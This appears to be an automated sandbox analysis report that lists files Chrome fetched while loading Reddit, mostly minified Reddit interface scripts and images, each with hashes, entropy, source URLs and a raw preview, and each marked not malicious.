                                                  Preview:import{g as t}from"./icon-4d9be652.js";var e;!function(t){t.NEUTRAL="NEUTRAL",t.SUCCESS="SUCCESS",t.WARNING="WARNING",t.ALERT="ALERT",t.PLAIN="PLAIN",t.DISABLED="DISABLED",t.DANGER="DANGER",t.INVERTED="INVERTED",t.SECONDARY="SECONDARY",t.MEDIA="MEDIA",t.BRAND="BRAND"}(e||(e={}));const n="bg-brand-background text-brand-onBackground",r="bg-secondary-background text-secondary-onBackground",o={[e.WARNING]:"bg-warning-background text-neutral-background",[e.SUCCESS]:"bg-success-background text-primary-onBackground",[e.NEUTRAL]:"bg-neutral-content text-neutral-background",[e.PLAIN]:r,[e.ALERT]:n,[e.BRAND]:n,[e.DANGER]:"bg-danger-background text-primary-onBackground",[e.DISABLED]:"bg-interactive-content-disabled text-neutral-background",[e.INVERTED]:"bg-inverted-neutral-background text-neutral-background",[e.SECONDARY]:r,[e.MEDIA]:"bg-media-background text-media-onBackground"},a=({attributes:n,appearance:r=e.NEUTRAL,content:a,outline:i=!1})=>{const{html:c,createElement:s}=t(),l=c`<span class="
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 320x180, components 3
                                                  Category:dropped
                                                  Size (bytes):16521
                                                  Entropy (8bit):7.972158103292172
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:60BF6358C9A34C1C8477F98FE866B6FA
                                                  SHA1:48896CF5DCC08A26F63EE8F734400492F1F1417B
                                                  SHA-256:E4009196FCF790FF385CCB1DED96E02A864430BC4AE54AE112DD69037C2D578D
                                                  SHA-512:830E326E230E3AC8AE0BE6256A75DB3A4EA11BBC74B25C1A33D7F418878D715CA2C92655E12F3FCAD9F63E28CC2B3B67624D8B71A59CB489C443EA0B87AB752B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@.."..................................................................................F.:l4.6....jtS...2V.0.i.<$=*....j.fe....}.c.V.j..ho......v.Rt#[b.@..U...Z.n.d....(:.&.Y:k.....2b..m(.D...S.lB...J.....lMp.cN.R@n..*V%(...3Z.p]..z#..^Z.E.>.1..k.]:."d...e{..z.|/..~.8.....R.b.$HL.f~}..$..5*.....#tW..K.~...?.....P.j...V...W.cW.....!v`H2.~.....Y.. {..@K..3?+.f.......p...#.7...Z..!w...Z^x.UX.6....Zr..Q.7..._.v.s]....H.@...,.z.M.......z7sV..O...%...4-.*../C...<...m...%...oL..W.!.;.W.2..}...DD.[.j...,..c..qU....^..=7...A?....h...Z....k..MV.9Ir.L)1.3...9.q.%F..:.>...S....O3.p..E.9..W?\nI.s...+...U?W..h..H.y.B..<6.."..t....I..qE`.c.b...{'...()....5S.@.6.....wO.y.>{...V...p..K....*nK.9.9........!.~.L.E.=0..p..G#.>..D.%~...}.....M>R.jt.=g.[....)......M.....gX(...0...#u6A<.K.uI<..!..e.|..^{..S.W..UC...w.j...Y....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (7954)
                                                  Category:downloaded
                                                  Size (bytes):8018
                                                  Entropy (8bit):5.295106736274169
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BE64F676454B343B76A0AFC6F17F3A2D
                                                  SHA1:D4DCD5AE910318CD80A633EE6A6E4D2BCDC020DB
                                                  SHA-256:E36D52BA69C1CB1105448649E0D6550DB29CE6605AAC4869920F37E1F2E10A30
                                                  SHA-512:705865DB0472442C445431A5F74370C632B021F463A1ADE3888AABEE8C5C5490C74CD4AC292C4F83E9548B11429A30B1921ED7712C282D84672B92FFB03E5893
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-gallery-carousel-b1446655.js
                                                  Preview:import{a as t,aY as e,aD as s,t as i,b as r,u as o,v as l,aS as n,_ as a,n as h,g as d,e as c}from"./shell-4994f581.js";import{N as p,C as u}from"./community-club-highlights-client-js-c7c6ec6d.js";import{x as v,a as y,I as w,s as m,cq as g,cp as I}from"./icon-4d9be652.js";import{b8 as b}from"./club-award-confirmation-client-js-b22d6f4f.js";import{G as x}from"./gallery-74f99861.js";import"./index-56e4320e.js";import"./index-e6388eb1.js";import"./links-27a3f3ef.js";var A;let f=A=class extends(t(m)){constructor(){super(...arguments),this.isMobile=!1,this.navPlacement=p.INSIDE,this.startIndex=0,this.scrollThreshold=A.SCROLL_EDGE_THRESHOLD,this.autoplayInterval=0,this.showOnlyOnHover=!1,this.moveOneUnit=!1,this.autoplayTimerId=0,this.shouldDisplayLeftArrow=!1,this.shouldDisplayRightArrow=!0,this.childrenIndexList=[],this.childrenInViewIndexList=[],this.isUserScrolling=!1,this.isHovered=!1,this.galleryContainerRef=e(),this.debouncedUpdateDisplayState=s((()=>this.updateDisplayState()),100),th
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 96 x 96, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3435
                                                  Entropy (8bit):7.778970902023134
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EE170FF7A7CA4A498333535280EF1421
                                                  SHA1:AF5EF33CED48D025030CDEE29ACEE20236CFE3FF
                                                  SHA-256:00F96C57E4C15810A6FAF0A4394AAC0F569304616C6369079F7F9089948C13CE
                                                  SHA-512:D9209FBE856E1E416374CB39607E33BD177BC2BA41BA9CF2E5CFC240764876B71714BE0A56241AB57DE251DBA1CF0CAAE3F4BBAECCDF0C29095418E69E3765CE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...`...`......F......PLTE......[.N..cmh[..y.....0u.f..|{.j.~n........N.COKB..L31+VQG./.3h,KG>DA8...WH....+*$=|5............gV.6o/...%#.rX .v+!B./_(......9s1.&..8.)R#JU.%K +X&...!C..............n).........[L.................q)...........................\M.............|c$...............L@..........................$...........#..#.....%..... ....M=.....'..,..r*.0.....*....~j'mT........4..#..9../."!..<........1.iW ...&#. ...?..5.......)'".o(.<."D.#G.....,. @..9..!."E....#"..>."D.#G..:....$I..%..3.0.(ZI.'O"...!:.#!..~.(@"0/))H#E.<ZUJ$0.,*$XI.-Z& ..>:3NJA&7 74.)'"/-'7:...8"9.5?.)U$..."E..B.ut,.>.D|4RND.v,>H..,.!3.JR ..5*-#Ns/lx/3I.3m-.9.FH....%J $?...2Bj,.,.Hy3:60VQG&$ B.942+KG?"I.2/)D@9.4.A>7/7'0b*GC;...&O ......Ri*A.86o/C.:>}5.^("8.IE<!$.?.6={4...{s,8r0..1..09x33h,@.7XQ..}/x_".v,Wn,iZ!,.......tRNS........................................................"#(/67=CJNRRYZ^afghnprsttvvw|}}~...........................................................................................
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5380)
                                                  Category:downloaded
                                                  Size (bytes):5465
                                                  Entropy (8bit):5.142874069813451
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D708FF096DDA32191E8DB183DA6A7B9E
                                                  SHA1:6B66C997A1BFFFD81AEE4A18A86674A9B3DDEF5B
                                                  SHA-256:E33AA2EDE5C286A9A5A742E7BB484EF31D3092FE4D82C627EBD963B414D06D02
                                                  SHA-512:0F2FD55DE862669010553A364FCD8ADF65C0BF6F0AC3150104429BFC78B369DAF13C85AA96B7BB339C21E06E82F999C01CFA097841336C8F25ACB5794FD72D40
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-onboarding-completed-modal-client-js-43e757b5.js
                                                  Preview:import{Y as e,_ as t,n as a,g as i,b8 as n,aY as o,hi as l,aS as s,e as r}from"./shell-4994f581.js";import{a as h,x as d}from"./icon-4d9be652.js";import{R as p}from"./rpl-bottom-sheet-8e59d76a.js";import"./index-56e4320e.js";import"./club-award-confirmation-client-js-b22d6f4f.js";class c{get matches(){return this.mediaQuery.matches}constructor(e,t){this.host=e,this.query=t,this.rafId=null,this.handleMediaChange=()=>{this.rafId&&cancelAnimationFrame(this.rafId),this.rafId=requestAnimationFrame((()=>{this.rafId=null,this.host.requestUpdate("matches",!this.matches)}))},e.addController(this),this.mediaQuery=window.matchMedia(t),this.mediaQuery.addEventListener("change",this.handleMediaChange)}async hostConnected(){}async hostDisconnected(){}}var m=h`${e}:host{display:contents}`;let f=class extends n{constructor(){super(...arguments),this.nonSyncedPropNames=["variant","litTemplateChildren","overlayBlur","dialogId","dialogClassName","blocking","disableCacheContents","noAnimate"],this.isTouch
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2160)
                                                  Category:downloaded
                                                  Size (bytes):2234
                                                  Entropy (8bit):5.253615670247569
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EFCDE3E9100B9762800171E90962AC83
                                                  SHA1:122942D9F7CCA9760EA6FCFEA234AD9EB99F5175
                                                  SHA-256:DBB7FEC3095E4EB48E3154C0194C3D5FC11F361AB25FCD169FECD46F54505D74
                                                  SHA-512:7F4B74D798CE17963CB5ECCFC2902C4CDDBC51277F8942E98E127408481BD6D32A6C8929D030D70DA39134FE80BF113B8C12B6F652F77294914131D1C0679AF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/chat-channel-feed-element-client-js-646e3acb.js
                                                  Preview:import{W as e,a7 as t,a8 as s,a9 as i,t as n,_ as a,n as r,e as l}from"./shell-4994f581.js";import{x as o,s as c}from"./icon-4d9be652.js";import"./all-chats-page-recommendations-client-js-e5594d8f.js";import"./club-award-confirmation-client-js-b22d6f4f.js";var d;!function(e){e.NONE="NONE",e.VIEWED="VIEWED",e.DISMISSED="DISMISSED"}(d||(d={}));const h="data-chat-feed-element-dismiss",m="data-chat-feed-element-clickable",u="click";let C=class extends(e(c)){constructor(){super(...arguments),this.consumptionState=d.NONE,this.uxtsVariant="chat_channel_unit_in_home_feed_scc",this.isRecommended=!1,this.isMultiChat=!1,this.onDismiss=e=>{const n=this.nextElementSibling;n&&"HR"===n.nodeName&&this.parentElement?.removeChild(n),this.parentNode?.removeChild(this),e.stopPropagation(),t(i.Dismiss,s.ChatChannelUnitInHomeFeed,{variantId:this.uxtsVariant})},this.onChatFeedElementClick=()=>{t(i.Click,s.ChatChannelUnitInHomeFeed,{variantId:this.uxtsVariant})}}connectedCallback(){super.connectedCallback(),t
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 108 x 108, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):2872
                                                  Entropy (8bit):7.8837336158787235
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D5C36AB7495397C57087EABA1E697AA3
                                                  SHA1:EF03EDE2C24EE67D5964DA8A0C012BC4A8127D1C
                                                  SHA-256:2D23827D4AAF1DB049984F90B621A96404F39502C0A789AC2F1EFA4CFC8E1C19
                                                  SHA-512:B0963EFE8B19E6B2FB156E37D32D966457592D71569B913BBCE1E9CC1B5095A8069875DE3E1895D71FE1B2C9C1E9CFB5994462E7E226BBC5F57FA24E2ACD5816
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/9ypx1kyfihid1_t5_2qh3l/News
                                                  Preview:.PNG........IHDR...l...l.............sRGB.........PLTELiq....................................xxx............GGGOOO...eeeZZZ.........ooo ;;;......fff.....................mmm........................}}}rrrTTT\\\...ccc===......KKK...................xxx...BBBiii:.....XXX.............FFF...........................................k.....!tRNS.."..a...20r.MR.n.4I..........B......IDATh..{c....{.5..4.6.&.t. b...I*...{\...U.|..q..D..[..>..sa~3....w..K..K;.~..i..a..>.......B..i.g...(...7X.CY....Ln.W>.i..GK<<.....#.Ur..a.L...i.qdP..^f..F..j.9b......X...u..ke..5....T....%.5CZ.(.....0..P.L....E1...?`.Z.^k......L.6.b..?.=f/..P..`.......U.(.$..E.P.Ua(z.J....jV.b..J..\..G*]....."kU .n"l.k.....Xw:eY......]r.!...N.+..........j......L....8..\..]..l..G]...<..C.....d...-K..a:.&....=$...!.g..c#.z..c.r8IB<$ .F...T........%r.D1V....x.>jh8T&...<.P.^..p..z.F.B,x.....\..Q...k...F.\/y..D.ae0..bf.p.p!.y~XPj6...$..5.#$A.i.4.s..$@..=......m...U...A.....y!..*!LB...t:..6..Q
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1362)
                                                  Category:downloaded
                                                  Size (bytes):1418
                                                  Entropy (8bit):5.380267699800542
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8CF1C1F560ABA255DFB74F69B897093F
                                                  SHA1:5CDEBFB578B87263555812D927607502457C7191
                                                  SHA-256:54947259FEACEDC428613C76EC46AC38F5F48D2794D67329C3478FE94FB79C53
                                                  SHA-512:09A65D00AEB6C233894046F21AAD66E34B8534EAB908EDE23DC66793E89D7C732D56D5040BAA50ACF542DCB27FA6BEF3C20CD37AB1832E13B328CE925D00EAE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-shimmer-252a0dfd.js
                                                  Preview:import{_ as e,n as r,I as t,e as i}from"./shell-4994f581.js";import{s,a,x as o}from"./icon-4d9be652.js";var n;!function(e){e.CIRCLE="circle",e.RECTANGLE="rectangle",e.PILL="pill"}(n||(n={}));const l=2500;let m=0,c=null,d=class extends s{constructor(){super(...arguments),this.shape=n.RECTANGLE,this.calcDelay=e=>{if(0===e)return 0;let r=0;const t=c?.getAnimations()[0];return t&&(r=t.effect?.getComputedTiming().progress*l),(r+200*e)%l}}static get styles(){return a`:host{display:inline-flex}:host([shape=pill]) #loader{border-radius:var(--rem8)}:host([shape=circle]) #loader{border-radius:50%}#loader{background:var(--color-shimmer-background);height:100%;width:100%;position:relative;overflow-x:hidden}#shimmer-object{background:var(--color-shimmer-gradient-overlay);border-radius:.5rem;height:100%;width:200%;position:absolute;top:0;left:0;transform:translateX(-100%)}`}firstUpdated(){this.shimmer(m++)}async shimmer(e){await new Promise((e=>requestAnimationFrame(e)));c||(c=this.shimmerObject);co
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2511)
                                                  Category:downloaded
                                                  Size (bytes):2574
                                                  Entropy (8bit):5.21795569726566
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F8ECA80F1B6E175EF82245E9CCF0A1F9
                                                  SHA1:C7DB2FDC4168BFB302CF49DE45142261A7C516B2
                                                  SHA-256:489393F6DE9C5AE6936B8CF1DB6D1210A11F3F3C05EB095240C3778292D512A8
                                                  SHA-512:DB6EC92AFD1FAD1230B540F338BEF257842E2FF044CE8760B4DF4BE10B5CC21C4D77367A60A7A5193EEA47AB3B8E6969EC330375B02024DA4410F6ED607CD149
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/activate-lead-gen-dialog-5e20bf34.js
                                                  Preview:import{t,_ as e,n as r,g as o,A as s,e as i,r as n,b5 as l,b6 as a}from"./shell-4994f581.js";import{s as d,A as c,x as y}from"./icon-4d9be652.js";let p=class extends d{constructor(){super(...arguments),this.postId="",this.impressionId="0",this.clickLocation=s.UNKNOWN,this.anchorStyleClass="",this.renderAsButton=!1,this.buttonProps={},this._currGalleryIndex=0,this._href="",this._currGalleryItemText="",this.handleGalleryNavEvent=t=>{t!==this._currGalleryIndex&&(this._currGalleryIndex=t,this._href=this.galleryOutboundLinks[this._currGalleryIndex],this.galleryContent&&(this._currGalleryItemText=this.galleryContent[this._currGalleryIndex]))}}connectedCallback(){super.connectedCallback(),this._href=this.galleryOutboundLinks[this._currGalleryIndex],this._currGalleryItemText=this.galleryContent?.[this._currGalleryIndex]}createRenderRoot(){return this}render(){if(this.galleryContent&&!this._currGalleryItemText)return c;const t=this._href||void 0;return y` <shreddit-dynamic-ad-link post-outbound
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:GIF image data, version 89a, 1 x 1
                                                  Category:downloaded
                                                  Size (bytes):43
                                                  Entropy (8bit):3.0950611313667666
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                  SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                  SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                  SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://ad-delivery.net/px.gif?ch=2
                                                  Preview:GIF89a.............!.......,...........L..;
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1559)
                                                  Category:downloaded
                                                  Size (bytes):1617
                                                  Entropy (8bit):5.314268137951905
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C2C15EA137D97705639AC83F5C274EB4
                                                  SHA1:F6367828D201A9651496A20731D5B3827065007E
                                                  SHA-256:C8752D208A3FC5F3A43CBD4EE99B1A0F2AE5C34E64D448E5F1C44D50842CB8B7
                                                  SHA-512:CF2C2E494ECA592D4F2B42F81D832FE9AAEAC42FA78E16762C6D33F6E6971D0347794B1D8B5B731EFFFD9EB9BC2F38DA6A0203D09064262ECD2CA324C091F87E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/reddit-recent-pages-c0f7b0df.js
                                                  Preview:import{a as e,_ as a,e as t,al as r,t as n,L as s}from"./shell-4994f581.js";import{s as c,x as o,u as i,I as l,A as d}from"./icon-4d9be652.js";import{r as p,j as u,k as m,l as g,n as h}from"./club-award-confirmation-client-js-b22d6f4f.js";import{l as k,L as f,e as b}from"./expandable-section-header-e3f969c2.js";const C=e(c);let _=class extends C{constructor(){super(...arguments),this.onPageClick=e=>{this.trackEvent(p()),this.trackEvent(r(e))}}static get styles(){return[n]}connectedCallback(){super.connectedCallback();const e=document.querySelector("shreddit-recent-page-data");if(e){const a=JSON.parse(e.getAttribute("data")??"");a&&(u(a,s.RecentPages,5),this.requestUpdate())}}renderPage(e){const a=e.communityIcon||e.iconImage,t=m({size:"sm",appearance:"icon",children:a?o`<img loading="lazy" src="${a}" aria-hidden="true" alt="">`:o`<span style="color:${e.keyColor||"inherit"}">${i({size:l.ExtraLarge})}</span>`});return k({onClick:()=>this.onPageClick(e.uuid.toLowerCase()),href:e.url,inner
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2151)
                                                  Category:downloaded
                                                  Size (bytes):2195
                                                  Entropy (8bit):5.229895392344499
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CB591C06707E611A55F60DE161B0A8A9
                                                  SHA1:414C3154AF4F80B693C5CF7981D5FC0B684D688E
                                                  SHA-256:9CDF83D67D8CC961F3A119E0F93E55A795058A6A4C0C0F68769EB377D37AC50B
                                                  SHA-512:241D17DAC616E424DEB1DF67799F8D10100DA4E4E18EDA7D8D4D694DF529F4BF70C30C47465B7AAC5381A16902C374B1B671F8F0B80BB1B87EA6A7613DC04B87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-169ed00b.js
                                                  Preview:import{gV as e,gW as t}from"./shell-4994f581.js";const n=t(),s=function(){const e=new WeakMap;let t=!1;return{get isDirty(){return t},getRegistration:(e,t,n)=>({target:e,key:t,value:n}),register({target:n,key:s,value:a}){const r=e.get(n);if(r&&!r.has(s))r.set(s,a);else{if(r)throw new Error(`Cannot register value for key ${s}; something is already registered!`);e.set(n,new Map([[s,a]]))}t=!0},unregister({target:n,key:s,value:a}){const r=e.get(n);r&&r.get(s)===a&&(r.delete(s),t=!0)},getRegisteredElements(n){const s=e.get(n);return t=!1,s},unregisterAll(n){e.delete(n),t=!0}}}(),a=e("FaceplateForm"),r=a.registerAncestorClass,i=a.connectToAncestor,o=Symbol.for("mixins/form-association");function c(e){return!!e&&o in e.constructor}function l(e){return!!e&&(e instanceof HTMLInputElement||e instanceof HTMLTextAreaElement||e instanceof HTMLSelectElement||o in e.constructor)}const p=new Set(["checkbox","radio"]);function u(e){return l(e)&&p.has(e.type)||c(e)&&"checked"in e}const g=new Set(["radi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1994)
                                                  Category:downloaded
                                                  Size (bytes):2069
                                                  Entropy (8bit):5.128929384241591
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D12C8361D2A8926C5DCAB4F109B75289
                                                  SHA1:1BDE6C9A0D5660BF9608D07926AB64B15F26F80A
                                                  SHA-256:F25DB21E9463494E8BC5C6E7F9CFBB772AC3EE61C11895B74E7F1810648E8E77
                                                  SHA-512:2FE0D4CE14431D1B33C38522C6AA047199F811E59A41CB3E073AEAFAD662F482A529B1B2FA5A08A85AF63DBA5E3B38FE1AADD4250DE21155DF9BD7F26833DAFC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/recommendation-context-overflow-menu-abe9c9f1.js
                                                  Preview:import{_ as t,e as o}from"./shell-4994f581.js";import{ShredditPostOverflowMenu as r}from"./shreddit-post-overflow-menu-cfb336ae.js";import{x as e}from"./icon-4d9be652.js";import"./faceplate-bottom-sheet-header-b31e0ad4.js";import"./app-selector-client-js-489f074c.js";import"./index-56e4320e.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./select-controller-fa3db659.js";import"./feedback-tooltip-overflow-menu-cbfa9270.js";import"./header-action-item-chat-client-js-98797a42.js";import"./expandable-section-header-e3f969c2.js";import"./with-post-actions-283c4a7a.js";import"./rpl-tooltip-958cc522.js";import"./tooltip.base-aa9be46d.js";import"./rpl-popper-3f91bd17.js";import"./profile-creation-61d368d7.js";import"./with-share-687454db.js";import"./ui-strings-aad5fab2.js";import"./content-action-button-5fdf727f.js";import"./index-7436fa38.js";import"./rpl-coachmark-56fcc983.js
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1911)
                                                  Category:downloaded
                                                  Size (bytes):1993
                                                  Entropy (8bit):5.292715621270578
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DCE68F7E7E201A638500B5E005F239DA
                                                  SHA1:EB0F3F02B1F8A80D40369EC835DA085F47B8BA84
                                                  SHA-256:08EABA41A805068083B78A35795E94618606A1012FE0B16D8DB84D3E2C3B478F
                                                  SHA-512:31380B4F779A5BD5F1C081E9AC15A92EA41BC27B9139061E96427C5F471642EE751B402CDDCB42128C16870FC0F50BCD5C8DD1ACC73ED6D024CA482D32DBDBBE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-value-upsell-bottom-bar-client-js-c411c424.js
                                                  Preview:import{c4 as t,_ as e,n as s,e as r,t as i}from"./shell-4994f581.js";import{x as o,s as a}from"./icon-4d9be652.js";import{a as l,b as n,A as h}from"./ui-strings-aad5fab2.js";import{A as p}from"./auth-flow-controller-2182cb9c.js";import"./password-recovery-fa619c78.js";import"./helpers-82480d34.js";import"./club-award-confirmation-client-js-b22d6f4f.js";const d={[t.Login]:"login",[t.Password]:"password",[t.Register]:"register",[t.RegisterPrompt]:"register",[t.RegisterEmailOnly]:"register",[t.PasswordRecovery]:"passwordrecovery",[t.Onboarding]:"onboarding",[t.PhoneAuth]:"login",[t.HighFlyerRegister]:"register",[t.LoggedInAction]:"register",[t.AnswersRegister]:"register",[t.CommunityValueRegister]:"register"};const g=a;let u=class extends g{constructor(){super(...arguments),this.step=t.Register,this.hasRegularFont=!1,this.hideUnderline=!1,this.hasFullWidth=!1,this.hasLargeText=!1,this.params={},this.authFlowController=new p(this),this.sendCustomEvent=t=>{t.preventDefault(),t.stopPropagati
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (480)
                                                  Category:downloaded
                                                  Size (bytes):525
                                                  Entropy (8bit):5.172470057961244
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:019EA866099FBD07972F796005C244B4
                                                  SHA1:493E14E94528C251DF6C3BA1E0ACF612EFA685C5
                                                  SHA-256:23CE11B8F29ADD3A82ED6F2A0D2C67E9EE38F0CACAAD44C66AC2539D3B669A4E
                                                  SHA-512:E92AF27286E20309CB22FD85858C0BB652670348EB5B8DBA3F26330D77D53008F45731D85D7544013CA6488D7C95C440E1063C0158ED0E97A8E6F2EF8E5775DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/xpromo-c45d37b6.js
                                                  Preview:import{b as o}from"./shell-4994f581.js";const n=()=>o({source:"xpromo",action:"view",noun:"rmp_fail"}),e=()=>o({source:"xpromo",action:"view",noun:"recap"}),r=n=>o({source:"xpromo",action:"click",noun:"recap"},{popup:{button_text:n}});var t;!function(o){o.Back="back",o.Close="close",o.GetApp="get_app",o.Login="login",o.NotOver18="im_not_over_18",o.Over18="continue",o.Signup="signup",o.DontShowAgain="dont_show",o.Report="report"}(t||(t={}));export{t as B,r as a,n as m,e as r};.//# sourceMappingURL=xpromo-c45d37b6.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (425)
                                                  Category:downloaded
                                                  Size (bytes):490
                                                  Entropy (8bit):5.346213659602871
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:292880865C0DD9BEF7FD475F4CD6A463
                                                  SHA1:3BB1FF748E9C6D34893627D5164DDEF04548A53C
                                                  SHA-256:899EBD69E688C20057C525F5E7C8C3F7C79220F7A66A865EE0230A33B16C33F7
                                                  SHA-512:D5A0923D51B12C79B620131ED8A88A8536ECB9950B2AF09C2790165D1DF2DBB0E606CB4AA717C68C7BD351806B6D2DB99D806AAE98744F345E26DE551C15A1EC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/community-status-telemetry-7d0e84ad.js
                                                  Preview:var t,T,s;!function(t){t.MODERATOR="moderator",t.COMMUNITY_STATUS="community_status"}(t||(t={})),function(t){t.VIEW="view",t.CLICK="click"}(T||(T={})),function(t){t.STATUS_EDIT="status_edit",t.STATUS_CANCEL="status_cancel",t.STATUS_CREATE="status_create",t.STATUS_DELETE="status_delete",t.STATUS_LINK="status_link",t.STATUS_DISPLAY="status_display",t.STATUS_SUB_LINK="subreddit_link"}(s||(s={}));export{T as A,s as N,t as S};.//# sourceMappingURL=community-status-telemetry-7d0e84ad.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (462)
                                                  Category:downloaded
                                                  Size (bytes):519
                                                  Entropy (8bit):4.9380945672656225
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:71BAB71D588BF8300C7B8885240D08CF
                                                  SHA1:BBDBC437C4D7898B38D289CDC163B215124359BC
                                                  SHA-256:9863A7138D2D6582AD5388A8D036E01D35C3B1C448603B31483C9D9CDBFC8FB1
                                                  SHA-512:2857EE17EBB7494E8ACB43265C1D971876D778370793987DE292934E748F0ADA7827E81B6EB932D1073258A57DFE502B603C680D8578FC01C6F3161B0544A002
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.js
                                                  Preview:import"./select-controller-fa3db659.js";import"./left-nav-top-section-7736257e.js";import"./reddit-sidebar-nav-28dd3865.js";import"./guides-entrypoint-tooltip-5b8e1fc8.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./expandable-section-header-e3f969c2.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./guides-224224e6.js";import"./rpl-tooltip-958cc522.js";import"./tooltip.base-aa9be46d.js";import"./rpl-popper-3f91bd17.js";.//# sourceMappingURL=left-nav-client-js-957bb8c9.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1398)
                                                  Category:downloaded
                                                  Size (bytes):1463
                                                  Entropy (8bit):5.233892491009275
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:177BEF45AE93AAD3F86C0ACBCC3F8FED
                                                  SHA1:40911766A8FDE69082444938E707A1DA06F10375
                                                  SHA-256:94F3F36E9F8C94A55FBC392FD61101F030B75F1980E07C3BB22F47072BBC2B5A
                                                  SHA-512:AF20AC4E4D5F4FC6F350BBDFA28DB226D43182FF48D2F988074EF062AC89F1739F22D8047F5346D52F7D309D0FB62FC6F29AF3DE395277F847A4D597AB05A019
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/author-flair-event-handler-2f9b1a2c.js
